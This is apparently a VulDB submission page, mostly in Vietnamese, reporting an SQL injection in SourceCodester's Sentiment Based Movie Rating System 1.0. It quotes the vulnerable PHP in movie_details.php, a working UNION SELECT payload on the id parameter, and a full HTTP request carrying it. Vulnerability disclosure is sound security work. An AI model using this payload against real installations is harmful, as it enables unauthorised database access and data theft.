Gửi #425464: SourceCodester Sentiment Based Movie Success Rating Prediction System v1.0 SQL Injectionthông tin

tiêu đề	SourceCodester Sentiment Based Movie Success Rating Prediction System v1.0 SQL Injection
Mô tả	# SQL Injection vulnerability was discovered in Sourcecodester's Sentiment Based Movie Success Rating Prediction System (movie details) Official Website: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html Version: 1.0 Related Code file: /msrps/movie_details.php dbname=msrps_db Payload: /msrps/?page=movie_details&id=-1' union select 1,database(),3,4,5,6,7,8,9,10,11,12,13--+ <hr> ```php <?php if(isset($_GET['id'])){ $qry = $conn->query("SELECT * FROM `movie_list` where id = '{$_GET['id']}'"); if($qry->num_rows > 0){ $res = $qry->fetch_array(); foreach($res as $k => $v){ if(!is_numeric($k)){ $$k = $v; } } $genre_qry = $conn->query("SELECT * FROM genre_list where id in ({$genres})"); $genre_arr = []; if($genre_qry->num_rows > 0) $genre_arr = array_column($genre_qry->fetch_all(MYSQLI_ASSOC),'name'); $genre_names = count($genre_arr) > 0 ? implode(", ",$genre_arr) : "N/A"; $description = str_replace("\n","<br>",$description); }else{ echo "<script>alert('Unknown Movie ID'); location.replace('./?page=movies');</script>"; } } else{ echo "<script>alert('Movie ID is required'); location.replace('./?page=movies');</script>"; } ?> ``` The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 1-24 of movie_details.php) Injection parameter: id ``` GET /msrps/?page=movie_details&id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13--+ HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=hagsp16r9jlvhceptmto1ngf5t Connection: close ``` ![image](https://github.com/user-attachments/assets/0bbc5ccb-5604-4314-858a-8050d0ed16b4)
Nguồn	⚠️ https://github.com/2967607153/CVE-report/blob/main/Sourcecodester-SQLi-Sentiment-Based-Moive-Rating.md
Người dùng	xuelian.Deng (UID 76269)
Đệ trình	17/10/2024 09:15 (cách đây 2 những năm)
Kiểm duyệt	18/10/2024 21:29 (2 days later)
Trạng thái	được chấp nhận
Mục VulDB	280950 [SourceCodester Sentiment Based Movie Rating System 1.0 /msrps/movie_details.php ID Tiêm SQL]
điểm	20

◂ Trước Tổng Quan Tiếp theo ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!